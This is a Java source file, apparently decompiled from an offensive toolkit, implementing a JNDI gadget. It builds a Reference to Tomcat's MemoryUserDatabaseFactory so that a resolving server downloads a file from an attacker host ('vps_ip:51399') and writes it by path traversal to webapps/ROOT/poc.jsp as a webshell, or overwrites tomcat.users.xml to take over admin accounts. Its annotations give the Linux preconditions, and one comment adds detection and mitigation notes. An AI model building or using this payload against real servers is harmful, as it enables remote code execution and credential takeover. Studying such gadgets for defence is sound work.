package com.ar3h.chains.gadget.impl.jndi.factory;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.param.Param;
import javax.naming.Reference;
import javax.naming.StringRefAddr;

/**
 * Terminal ({@link Tag#END}) JNDI gadget that emits a {@link Reference} whose object factory is
 * Tomcat's {@code org.apache.catalina.users.MemoryUserDatabaseFactory}.
 *
 * <p>The reference carries exactly two string addresses: {@code readonly="false"} and
 * {@code pathname=url}. Per the annotation text, a JNDI client that resolves this reference with
 * the listed Tomcat dependencies on its classpath ends up fetching {@code url} and writing the
 * result to a path under the Tomcat installation (the examples use {@code ../} segments to reach
 * {@code webapps/ROOT/poc.jsp} or {@code conf/tomcat.users.xml}); on Windows it fires directly,
 * on Linux two directories must be created first with {@code H2CreateDirRef} or
 * {@code VelocityCreateDirRef}.
 *
 * <p>Defensive view: the identifying shape is a lookup result whose factory class name is
 * {@code MemoryUserDatabaseFactory}, with {@code readonly} equal to {@code "false"} and a
 * {@code pathname} that is a remote URL containing traversal segments. Detection can key on
 * those three fields; the root mitigation is refusing to resolve attacker-supplied JNDI references
 * at all, since the factory is only reachable through such a resolution.
 *
 * <p>Decompiled from
 * {@code BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/jndi/factory/MemoryUserDatabaseFactoryWriteFile.class}.
 */
@GadgetAnnotation(name = "Tomcat MemoryUserDatabaseFactory 写文件RCE", description = "factory: org.apache.catalina.users.MemoryUserDatabaseFactory\nclassName: org.apache.catalina.UserDatabase\n\n写文件RCE，Windows无需创建文件夹可直接触发该Gadget; Linux下需要配合其他姿势创建两个文件夹才可以写入\n可通过 H2CreateDirRef 或者 VelocityCreateDirRef 进行创建文件夹:\nstep1, create dir: http:\nstep2, create dir: http:/127.0.0.1:51399\n\n实际创建好的两层目录 http:/127.0.0.1:51399\n", dependencies = {"tomcat", "tomcat-juli", "tomcat-util", "tomcat-util-scan"})
@GadgetTags(tags = {Tag.Reference, Tag.END})
public class MemoryUserDatabaseFactoryWriteFile implements Gadget {

    /** Class name the emitted reference claims to resolve to. */
    private static final String TARGET_CLASS_NAME = "org.apache.catalina.UserDatabase";

    /** Object factory the resolving JNDI client instantiates to materialise the reference. */
    private static final String FACTORY_CLASS_NAME = "org.apache.catalina.users.MemoryUserDatabaseFactory";

    /** Address key for the factory's read-only flag; this gadget always sets it to {@code "false"}. */
    private static final String READONLY_ADDR = "readonly";

    /** Address key for the factory's pathname; this gadget fills it from {@link #url}. */
    private static final String PATHNAME_ADDR = "pathname";

    /**
     * Value placed in the {@code pathname} address. The annotation text documents it as a URL the
     * factory fetches, with the trailing path deciding where under Tomcat the content is written.
     */
    @Param(name = "http url", description = "下面例子会从远程访问url并下载文件到 webapps/ROOT/poc.jsp 目录\neg1: http://vps_ip:51399/../../webapps/ROOT/poc.jsp\n\n覆盖后台账号密码\neg2: http://vps_ip:51399/../../conf/tomcat.users.xml")
    public String url = "http://vps_ip:51399/../../webapps/ROOT/poc.jsp";

    /**
     * Builds the gadget payload.
     *
     * @return a {@link Reference} for {@code org.apache.catalina.UserDatabase} backed by
     *         {@code MemoryUserDatabaseFactory}, carrying {@code readonly="false"} and
     *         {@code pathname=url}, in that order
     */
    Object getObject() {
        return referenceFor(this.url);
    }

    /**
     * Assembles the reference for a given pathname. Kept as a pure helper so the exact address
     * layout (two {@link StringRefAddr} entries, {@code readonly} first) is visible in one place.
     *
     * @param pathname value of the {@code pathname} address
     * @return the assembled reference
     */
    private static Reference referenceFor(String pathname) {
        Reference ref = new Reference(TARGET_CLASS_NAME, FACTORY_CLASS_NAME, (String) null);
        ref.add(new StringRefAddr(READONLY_ADDR, "false"));
        ref.add(new StringRefAddr(PATHNAME_ADDR, pathname));
        return ref;
    }

    /**
     * Gadget entry point; the context and chain are not consulted, the reference is returned as-is.
     *
     * @param gadgetContext unused
     * @param gadgetChain   unused
     * @return the same object as {@link #getObject()}
     * @throws Exception never thrown here; declared by the {@link Gadget} contract
     */
    @Override
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject();
    }
}
